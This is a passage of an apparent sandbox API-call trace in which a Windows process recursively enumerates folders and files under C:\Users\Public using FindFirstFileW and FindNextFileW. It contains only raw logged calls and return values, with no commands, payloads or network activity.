ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x116, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0184.826] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.826] lstrlenW (lpString="desktop.ini") returned 11 [0184.826] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\My Music\\*", lpFindFileData=0x704750 | out: lpFindFileData=0x704750*(dwFileAttributes=0x6eb570, ftCreationTime.dwLowDateTime=0x6ec548, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="WINDOW~3.URL")) returned 0xffffffff [0184.826] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x704750 | out: hHeap=0x6b0000) returned 1 [0184.827] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0184.827] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.827] lstrlenW (lpString="My Pictures") returned 11 [0184.827] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures\\*", lpFindFileData=0x704750 | out: lpFindFileData=0x704750*(dwFileAttributes=0x6eb570, ftCreationTime.dwLowDateTime=0x6ec548, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="WINDOW~3.URL")) returned 0xffffffff [0184.827] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x704750 | out: hHeap=0x6b0000) returned 1 [0184.827] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0184.827] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.827] lstrlenW (lpString="My Videos") returned 9 [0184.827] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\My Videos\\*", lpFindFileData=0x704750 | out: lpFindFileData=0x704750*(dwFileAttributes=0x6eb570, ftCreationTime.dwLowDateTime=0x6ec548, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="WINDOW~3.URL")) returned 0xffffffff [0184.827] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x704750 | out: hHeap=0x6b0000) returned 1 [0184.827] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0 [0184.827] FindClose (in: hFindFile=0x6ebd20 | out: hFindFile=0x6ebd20) returned 1 [0184.854] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7ae0 | out: hHeap=0x6b0000) returned 1 [0184.854] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0184.854] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.854] lstrlenW (lpString="Downloads") returned 9 [0184.854] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Downloads\\*", lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName=".", cAlternateFileName="")) returned 0x6ebd20 [0184.855] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="..", cAlternateFileName="")) returned 1 [0184.855] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.855] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28351f0f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0184.855] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.855] lstrlenW (lpString="desktop.ini") returned 11 [0184.855] FindClose (in: hFindFile=0x6ebd20 | out: hFindFile=0x6ebd20) returned 1 [0184.855] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7ae0 | out: hHeap=0x6b0000) returned 1 [0184.855] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfdae6622, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaee7d305, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0184.855] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.855] lstrlenW (lpString="Favorites") returned 9 [0184.855] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Favorites\\*", lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfdae6622, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaee7d305, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName=".", cAlternateFileName="")) returned 0x6ebd20 [0184.856] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfdae6622, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaee7d305, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="..", cAlternateFileName="")) returned 1 [0184.856] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.856] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfdae6622, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaee7d305, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="..", cAlternateFileName="")) returned 0 [0184.856] FindClose (in: hFindFile=0x6ebd20 | out: hFindFile=0x6ebd20) returned 1 [0184.858] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7ae0 | out: hHeap=0x6b0000) returned 1 [0184.858] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28a29e5c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Libraries", cAlternateFileName="LIBRAR~1")) returned 1 [0184.858] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.858] lstrlenW (lpString="Libraries") returned 9 [0184.858] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\*", lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28a29e5c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName=".", cAlternateFileName="")) returned 0x6ebd20 [0184.859] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28a29e5c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="..", cAlternateFileName="")) returned 1 [0184.859] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.859] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2839e1d0, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2839e1d0, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288f9359, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x58, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0184.859] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.859] lstrlenW (lpString="desktop.ini") returned 11 [0184.859] FindClose (in: hFindFile=0x6ebd20 | out: hFindFile=0x6ebd20) returned 1 [0184.859] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7ae0 | out: hHeap=0x6b0000) returned 1 [0184.859] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0184.859] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.859] lstrlenW (lpString="Music") returned 5 [0184.859] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Music\\*", lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName=".", cAlternateFileName="")) returned 0x6ebd20 [0184.859] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="..", cAlternateFileName="")) returned 1 [0184.859] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.859] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28305c4e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0184.859] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.860] lstrlenW (lpString="desktop.ini") returned 11 [0184.860] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\*", lpFindFileData=0x704750 | out: lpFindFileData=0x704750*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8031a7b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6ebd60 [0184.865] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x704750 | out: lpFindFileData=0x704750*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8031a7b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.865] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.865] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x704750 | out: lpFindFileData=0x704750*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x24a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0184.865] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.865] lstrlenW (lpString="desktop.ini") returned 11 [0184.866] FindClose (in: hFindFile=0x6ebd60 | out: hFindFile=0x6ebd60) returned 1 [0184.866] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x704750 | out: hHeap=0x6b0000) returned 1 [0184.866] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8031a7b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="Sample Music", cAlternateFileName="SAMPLE~1")) returned 0 [0184.867] FindClose (in: hFindFile=0x6ebd20 | out: hFindFile=0x6ebd20) returned 1 [0184.867] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7ae0 | out: hHeap=0x6b0000) returned 1 [0184.867] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0184.867] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.867] lstrlenW (lpString="Pictures") returned 8 [0184.867] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\*", lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName=".", cAlternateFileName="")) returned 0x6ebd20 [0184.867] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="..", cAlternateFileName="")) returned 1 [0184.867] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.867] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0184.867] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.867] lstrlenW (lpString="desktop.ini") returned 11 [0184.867] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\*", lpFindFileData=0x704750 | out: lpFindFileData=0x704750*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6ebd60 [0185.119] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x704750 | out: lpFindFileData=0x704750*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0185.119] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0185.119] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x704750 | out: lpFindFileData=0x704750*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xd6b22, dwReserved0=0x0, dwReserved1=0x0, cFileName="Chrysanthemum.jpg", cAlternateFileName="CHRYSA~1.JPG")) returned 1 [0185.135] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0185.135] lstrlenW (lpString="Chrysanthemum.jpg") returned 17 [0185.135] FindClose (in: hFindFile=0x6ebd60 | out: hFindFile=0x6ebd60) returned 1 [0185.136] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x704750 | out: hHeap=0x6b0000) returned 1 [0185.136] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="Sample Pictures", cAlternateFileName="SAMPLE~1")) returned 0 [0185.136] FindClose (in: hFindFile=0x6ebd20 | out: hFindFile=0x6ebd20) returned 1 [0185.136] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7ae0 | out: hHeap=0x6b0000) returned 1 [0185.136] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recorded TV", cAlternateFileName="RECORD~1")) returned 1 [0185.136] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0185.136] lstrlenW (lpString="Recorded TV") returned 11 [0185.136] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\*", lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName=".", cAlternateFileName="")) returned 0x6ebd20 [0185.137] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="..", cAlternateFileName="")) returned 1 [0185.137] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0185.137] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x26, 